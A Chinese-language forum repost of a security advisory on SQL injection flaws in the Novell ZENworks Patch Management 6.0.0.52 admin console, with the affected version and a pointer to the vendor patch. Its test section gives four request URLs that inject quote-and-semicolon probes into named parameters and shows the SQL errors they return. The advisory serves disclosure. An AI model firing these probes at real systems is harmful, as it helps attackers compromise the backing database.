〖受影响系统: NovellZENwork...... 受影响系统: Novell ZENworks Patch Managemen 6.0.0.52 不受影响系统: Novell ZENworks Patch Managemen 6.2 描述: BUGTRAQ ID: 15220 Novell的ZENworks组件允许组织从SuSE Linux平台管理Windows工作站,Patch Management是其中用于管理补丁的组件。ZENworks Patch Management的管理控制台中存在多个SQL注入漏洞,远程攻击者可以完全入侵基础数据库系统。但如果要利用这个漏洞,管理员应至少手动创建了一个非特权用户帐号。 测试方法: 【警告:以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!】 http://192.168.1.10/computers/default.asp?sort=&Direction='; Response from server: Incorrect syntax near ', @RecsPerPage=100, @FirstRec=0, @Action=0, @Search = ', @groupFilter = '. http://192.168.1.10/reports/default.asp?sort=[ReportImpact_Name] &Dir=asc&SearchText=';StatusFilter=ERRR&computerFilter=187&impactFilter=29&saveFilter=save &Page=rep Response from server: Incorrecy syntax near ', @delimiter='. http://192.168.1.10/reports/default.asp?sort=[ReportImpact_Name] &Dir=asc&SearchText=CIRT.DK&StatusFilter=';&computerFilter=187&impactFilter=29&saveFilter= save&Page=rep Response from server: Incorrect syntax near ', @groupFilter = ', @ImpactFilter = '. http://192.168.1.10/reports/default.asp?sort=[ReportImpact_Name] &Dir=asc&SearchText=CIRT.DK&StatusFilter=ERRR&computerFilter=';&impactFilter=29&saveFilter =save&Page=rep Response from server: Line 1: Incorrect syntax near ', @Contact_ID='. 建议: 厂商补丁: Novell 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: |
|小黑屋|最新主题|手机版|微赢网络技术论坛 ( 苏ICP备08020429号 )
GMT+8, 2024-9-30 05:30 , Processed in 0.076615 second(s), 12 queries , Gzip On, MemCache On.
Powered by Discuz! X3.5
© 2001-2023 Discuz! Team.